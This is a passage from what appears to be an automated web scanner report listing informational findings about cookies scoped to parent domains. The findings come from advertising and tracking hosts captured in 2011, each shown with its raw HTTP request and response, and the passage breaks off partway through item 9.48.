Path:   /site=766755/size=180150/u=2/bnum=73910453/hr=12/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fsports.yahoo.com%252Fnfl%252Fblog%252Fshutdown_corner%252Fpost%252FTiki-Barber-remains-unemployed-and-sad%253Furn%253Dnfl-wp6443

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=766755/size=180150/u=2/bnum=73910453/hr=12/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fsports.yahoo.com%252Fnfl%252Fblog%252Fshutdown_corner%252Fpost%252FTiki-Barber-remains-unemployed-and-sad%253Furn%253Dnfl-wp6443 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://uac.advertising.com/wrapper/aceUAC.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.957105.766755.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Tue, 06 Sep 2011 12:44:52 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 662
Date: Tue, 06 Sep 2011 12:44:52 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 12:44:52 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<iframe src="http://www.adfusion.com/Adfusion.PartnerSite/categoryhtml.aspx?userfeedguid=f03bf662-d78f-4004-8d86-f571fc57b7fd&clickTag=http://r1-ads.ace.advertising.com/click/site=0000
...[SNIP]...

9.37. http://r1-ads.ace.advertising.com/site=790042/size=180150/u=2/bnum=62371385/hr=12/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fsports.yahoo.com%252Fnfl%252Fblog%252Fshutdown_corner%252Fpost%252FTiki-Barber-remains-unemployed-and-sad%253Furn%253Dnfl-wp6443  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=790042/size=180150/u=2/bnum=62371385/hr=12/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fsports.yahoo.com%252Fnfl%252Fblog%252Fshutdown_corner%252Fpost%252FTiki-Barber-remains-unemployed-and-sad%253Furn%253Dnfl-wp6443

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=790042/size=180150/u=2/bnum=62371385/hr=12/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fsports.yahoo.com%252Fnfl%252Fblog%252Fshutdown_corner%252Fpost%252FTiki-Barber-remains-unemployed-and-sad%253Furn%253Dnfl-wp6443 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://uac.advertising.com/wrapper/aceUAC.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.957105.790042.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Tue, 06 Sep 2011 12:44:52 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 662
Date: Tue, 06 Sep 2011 12:44:53 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 12:44:52 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<iframe src="http://www.adfusion.com/Adfusion.PartnerSite/categoryhtml.aspx?userfeedguid=f03bf662-d78f-4004-8d86-f571fc57b7fd&clickTag=http://r1-ads.ace.advertising.com/click/site=0000
...[SNIP]...

9.38. http://redirect.rtrk.com/redirect  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://redirect.rtrk.com
Path:   /redirect

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /redirect?RL_rurl=http://utdi.reachlocal.com/coupon/&RL_qstr=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26rl_key%3De2e30c5686d91c3f4971163361e1b86a%26kw%3D233292%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice%26pub_cr_id%3D8668759748&RL_ckstr=RlocalUID%3Dscid%253D2323693%2526cid%253D837045%2526tc%253D11090604520111271%2526kw%253D233292%3BRlocalHilite%3Dkw_hilite_off%253D0%2526se_refer%253Dhttp%25253A%25252F%25252Fwww.google.com%25252Fsearch%25253Fsourceid%25253Dchrome%252526ie%25253DUTF-8%252526q%25253Dtelephone%25252Bservice%3BRlocalTiming%3Dlanding_loadtime_off%253D0%2526retarget_off%253D0 HTTP/1.1
Host: redirect.rtrk.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:52:03 GMT
Server: Apache
Set-Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; domain=.rtrk.com; path=/
Set-Cookie: RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; domain=.rtrk.com; path=/
Set-Cookie: RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; domain=.rtrk.com; path=/
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Location: http://utdi.reachlocal.com/coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748
Vary: Accept-Encoding
Content-Length: 587
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7f45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:16:56 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.reachlocal.com/coupon/?scid=2323693
...[SNIP]...

9.39. http://sales.liveperson.net/hc/21807557/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/21807557/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hc/21807557/?&site=21807557&cmd=mTagUrl&lpCallId=407482566544-792098556877&protV=20&lpjson=1&SV%21impression-query-name=chat-scottrade-english-header&SV%21impression-query-room=chat-scottrade-english-header&id=8862763361&info=button-impression%3Achat-scottrade-english-header%28Online%20Trading%20%26%20Investing%20%u2013%20Stock%20Trading%20Tools%2C%20Platforms%20%26%20More%20%7C%20Scottrade%29&waitForVisitor=true&d=1315331337781&page=http%3A//sales.liveperson.net/hcp/width/img40.gif HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.scottrade.com/online-trading.html?cid=AM|46|1542|1206|131&rid=L|1736690&amvid=OPT_OUT&symbol=SPY
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=8088123106932915638; HumanClickSiteContainerID_21807557=STANDALONE; LivePersonID=-5110247826455-1315313336:-1:-1:-1:-1; LivePersonID=LP i=5110247826455,d=1314795678; ASPSESSIONIDQCCCSCCQ=AJBDBJDAOIIOIDAHABHJGONH; HumanClickACTIVE=1315313334861

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:48:59 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Tue, 06 Sep 2011 12:48:59 GMT
Set-Cookie: HumanClickSiteContainerID_21807557=STANDALONE; path=/hc/21807557
Set-Cookie: LivePersonID=-5110247826455-1315313336:-1:-1:-1:-1; expires=Wed, 05-Sep-2012 12:48:59 GMT; path=/hc/21807557; domain=.liveperson.net
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 119

lpConnLib.Process({"ResultSet": {"lpCallId":"407482566544-792098556877","lpCallConfirm":"","lpData":[{"result":40}]}});

9.40. http://sensor2.suitesmart.com/sensor4.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sensor2.suitesmart.com
Path:   /sensor4.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sensor4.js?GID=15493;CRE=;PLA=;ADI=; HTTP/1.1
Host: sensor2.suitesmart.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/nfl/blog/shutdown_corner/post/Tiki-Barber-remains-unemployed-and-sad?urn=nfl-wp6443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: G15740=C1S104345-1-0-0-0-1314814746-0; spass=a1bfb027540676fe37eda0dd3047b05c

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:44:50 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: G15493=C1S99917-2-0-0-0-1315313090-0; path=/; domain=.suitesmart.com; expires=Sun, 04-Mar-2012 12:44:50 GMT
Pragma: no-cache
Cache-control: no-cache
P3P: CP="ALL DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" , policyref="http://www.suitesmart.com/privacy/p3p/policy.p3p"
Connection: close
Content-Type: text/html
Expires: Tue, 06 Sep 2011 12:44:50 GMT
Content-Length: 376

<!--
var serviceFlag = typeof(serviceFlag) == "undefined" ? false:serviceFlag;
var swCtrl = false;
var snote = 'Sorry SAM';
if (typeof(RunService) == "undefined"){
RunService = new Function();
S
...[SNIP]...

9.41. http://testdm.travelers.com/trvwics.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://testdm.travelers.com
Path:   /trvwics.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /trvwics.gif?TraceAgent=IMP&ad_id=222372080&siteAlias=332867993 HTTP/1.1
Host: testdm.travelers.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/TR1/iview/332867993/direct/01?time=1315313115&click=http://ads.bluelithium.com/clk?3,eAGlkEtvm0AUhf9MV5XLzDAzDAmaxfBweBhjHBybbCweDg7ggoHIpr--qK6t7ns255Ou7rm6B2EtQ.SDoYMCP57QQWW5hrCMDxlVkIpmUNM0mamEyQRBONt5G1PYxtIR-tlpN-KmrnXDvyiEL5w7QyFCYRqu8jX5H3lJf71P.8.N3H0cmg4Wt7Ria89XpaM.sk3rEkfhZSnHZLENSWDGgx.Na9-AJD754yLKyHuUV370dlq-LCv.sSj47DgM7TMARd2kSS0lXS6NybFppKw5gVfnhSN6VoqirA.A50xlKsYSIiqEmLAJ6CQZTYAYIzIDJu.bpht68MplqihElemzv7YMsB.rgYvyTTlXaZ.1QWevrzT2gvgTQvozznQQ81jYQQCs3YojjCiWIYYULHjWtNf91nNWFmvFui2jWrqUoav6x5wlFT3Nc0sYi.0voPN4311FrpvrsfgB3FvMlAUpQ1h9YsDjnZpcdtmmcu0yTT9x-D6mWRMCwRVCCcIErDkE37.da7l9808lvwEx7qgw,
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ad_guid_imp=ef62eaf6-2da3-4346-8fe2-c70fb482c03a~TraceAgent=IMP&ad_id=222372080&siteAlias=332867993&~09/05/2011 03:44.28.962 PM EDT; redUmbrella=BD27701E6D77E3FB7CEC6F2728F9B165C580796943B8785C1738755EA976ADED3F9E774C

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
Content-Type: image/gif
Expires: Thu, 01 Dec 1994 16:00:00 GMT
P3P: CP="NON ADM DEV TAI PSA PSD IVA OUR IND UNI COM NAV STA"
Pragma: no-cache
Set-Cookie: ad_guid_imp=7ffd757b-6447-4d98-ae3d-054ef9348332~TraceAgent=IMP&ad_id=222372080&siteAlias=332867993&~09/06/2011 08:45.29.491 AM EDT; Domain=.travelers.com; Expires=Wed, 5-Sep-12 12:45:29 GMT; Path=/
Content-Length: 43
Connection: keep-alive

GIF89a.............!.......,...........D..;

9.42. http://tr.adinterax.com/re/yahoohouse%2CSapientTest%2FYahoo_IM%2FYAHOO_143_B2C_Mail_IM_Expandable_954x60_AdInterax%2CC%3DMail%2CP%3DYahoo%2CK%3D3078081/0.056024663150310516/0/in%2Cti/ti.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tr.adinterax.com
Path:   /re/yahoohouse%2CSapientTest%2FYahoo_IM%2FYAHOO_143_B2C_Mail_IM_Expandable_954x60_AdInterax%2CC%3DMail%2CP%3DYahoo%2CK%3D3078081/0.056024663150310516/0/in%2Cti/ti.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /re/yahoohouse%2CSapientTest%2FYahoo_IM%2FYAHOO_143_B2C_Mail_IM_Expandable_954x60_AdInterax%2CC%3DMail%2CP%3DYahoo%2CK%3D3078081/0.056024663150310516/0/in%2Cti/ti.gif HTTP/1.1
Host: tr.adinterax.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/nfl/blog/shutdown_corner/post/Tiki-Barber-remains-unemployed-and-sad?urn=nfl-wp6443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=01345f4e62cacd40; adxf=696749@1@221

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:44:46 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: adxf=696749@1@221.3078081@1@223; expires=Thu, 31 Dec 2015 00:00:00 GMT; domain=.adinterax.com; path=/
Cache-Control: no-cache, private
Connection: close
Content-Type: text/plain; charset=utf-8
Content-Length: 1

0

9.43. http://tr.adinterax.com/re/yahoohouse%2CSapientTest%2FYahoo_IM%2FYAHOO_143_B2C_Mail_IM_Expandable_954x60_AdInterax%2CC%3DMail%2CP%3DYahoo%2CK%3D3078081/0.7168486232403666/0/in%2Cti/ti.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tr.adinterax.com
Path:   /re/yahoohouse%2CSapientTest%2FYahoo_IM%2FYAHOO_143_B2C_Mail_IM_Expandable_954x60_AdInterax%2CC%3DMail%2CP%3DYahoo%2CK%3D3078081/0.7168486232403666/0/in%2Cti/ti.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /re/yahoohouse%2CSapientTest%2FYahoo_IM%2FYAHOO_143_B2C_Mail_IM_Expandable_954x60_AdInterax%2CC%3DMail%2CP%3DYahoo%2CK%3D3078081/0.7168486232403666/0/in%2Cti/ti.gif HTTP/1.1
Host: tr.adinterax.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/nfl/blog/shutdown_corner/post/Tiki-Barber-remains-unemployed-and-sad?urn=nfl-wp6443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=01345f4e62cacd40; adxf=696749@1@221

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:44:46 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: adxf=696749@1@221.3078081@1@223; expires=Thu, 31 Dec 2015 00:00:00 GMT; domain=.adinterax.com; path=/
Cache-Control: no-cache, private
Connection: close
Content-Type: text/plain; charset=utf-8
Content-Length: 1

0

9.44. http://tr.adinterax.com/re/yahoohouse%2CUMU_Yahoo_Fantasy_Football_2_SportsFix_072711%2CC%3DUMU%2CP%3DYahoo%2CK%3D1620020/0.8961339080706239/0/ti.0%2Cai.0/ti.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tr.adinterax.com
Path:   /re/yahoohouse%2CUMU_Yahoo_Fantasy_Football_2_SportsFix_072711%2CC%3DUMU%2CP%3DYahoo%2CK%3D1620020/0.8961339080706239/0/ti.0%2Cai.0/ti.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /re/yahoohouse%2CUMU_Yahoo_Fantasy_Football_2_SportsFix_072711%2CC%3DUMU%2CP%3DYahoo%2CK%3D1620020/0.8961339080706239/0/ti.0%2Cai.0/ti.gif HTTP/1.1
Host: tr.adinterax.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/nfl/blog/shutdown_corner/post/Tiki-Barber-remains-unemployed-and-sad?urn=nfl-wp6443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=01345f4e62cacd40; adxf=696749@1@221.3078081@1@223

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:44:58 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: adxf=696749@1@221.3078081@1@223.1620020@1@223; expires=Thu, 31 Dec 2015 00:00:00 GMT; domain=.adinterax.com; path=/
Cache-Control: no-cache, private
Connection: close
Content-Type: text/plain; charset=utf-8
Content-Length: 1

0

9.45. http://tr.adinterax.com/re/yahoohouse%2CUMU_Yahoo_Movies_TransparentPurple_070611%2CC%3DUMU%2CP%3DYahoo%2CK%3D1071929/0.18778627226129174/0/ti.0%2Cai.0/ti.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tr.adinterax.com
Path:   /re/yahoohouse%2CUMU_Yahoo_Movies_TransparentPurple_070611%2CC%3DUMU%2CP%3DYahoo%2CK%3D1071929/0.18778627226129174/0/ti.0%2Cai.0/ti.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /re/yahoohouse%2CUMU_Yahoo_Movies_TransparentPurple_070611%2CC%3DUMU%2CP%3DYahoo%2CK%3D1071929/0.18778627226129174/0/ti.0%2Cai.0/ti.gif HTTP/1.1
Host: tr.adinterax.com
Proxy-Connection: keep-alive
Referer: http://movies.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=01345f4e62cacd40; adxf=696749@1@221.3078081@1@223.1620020@1@223.2481772@1@223

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:45:35 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: adxf=696749@1@221.3078081@1@223.1620020@1@223.2481772@1@223.1071929@1@223; expires=Thu, 31 Dec 2015 00:00:00 GMT; domain=.adinterax.com; path=/
Cache-Control: no-cache, private
Connection: close
Content-Type: text/plain; charset=utf-8
Content-Length: 1

0

9.46. http://tr.adinterax.com/re/yahoohouse%2CUMU_Yahoo_Movies_TransparentPurple_070611%2CC%3DUMU%2CP%3DYahoo%2CK%3D1071929/0.3155718557536602/0/ti.0%2Cai.0/ti.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tr.adinterax.com
Path:   /re/yahoohouse%2CUMU_Yahoo_Movies_TransparentPurple_070611%2CC%3DUMU%2CP%3DYahoo%2CK%3D1071929/0.3155718557536602/0/ti.0%2Cai.0/ti.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /re/yahoohouse%2CUMU_Yahoo_Movies_TransparentPurple_070611%2CC%3DUMU%2CP%3DYahoo%2CK%3D1071929/0.3155718557536602/0/ti.0%2Cai.0/ti.gif HTTP/1.1
Host: tr.adinterax.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=01345f4e62cacd40; adxf=696749@1@221.3078081@1@223.1620020@1@223.2481772@1@223.1071929@1@223

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:45:59 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: adxf=696749@1@221.3078081@1@223.1620020@1@223.2481772@1@223.1071929@2@223; expires=Thu, 31 Dec 2015 00:00:00 GMT; domain=.adinterax.com; path=/
Cache-Control: no-cache, private
Connection: close
Content-Type: text/plain; charset=utf-8
Content-Length: 1

0

9.47. http://tr.adinterax.com/re/yahoohouse%2CYahoo_Homepage_Homerooms_Polite_Download_954x60_082211%2CC%3DHomepage%2CP%3DYahoo%2CK%3D2481772/0.8853373541496694/0/in%2Cti/ti.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tr.adinterax.com
Path:   /re/yahoohouse%2CYahoo_Homepage_Homerooms_Polite_Download_954x60_082211%2CC%3DHomepage%2CP%3DYahoo%2CK%3D2481772/0.8853373541496694/0/in%2Cti/ti.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /re/yahoohouse%2CYahoo_Homepage_Homerooms_Polite_Download_954x60_082211%2CC%3DHomepage%2CP%3DYahoo%2CK%3D2481772/0.8853373541496694/0/in%2Cti/ti.gif HTTP/1.1
Host: tr.adinterax.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=01345f4e62cacd40; adxf=696749@1@221.3078081@1@223.1620020@1@223

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:45:18 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: adxf=696749@1@221.3078081@1@223.1620020@1@223.2481772@1@223; expires=Thu, 31 Dec 2015 00:00:00 GMT; domain=.adinterax.com; path=/
Cache-Control: no-cache, private
Connection: close
Content-Type: text/plain; charset=utf-8
Content-Length: 1

0

9.48. http://utdi.reachlocal.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://utdi.reachlocal.com
Path:   /

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?scid=2323693&kw=233292&pub_cr_id=8668759748 HTTP/1.1
Host: utdi.reachlocal.com
Proxy-Connection: keep-alive
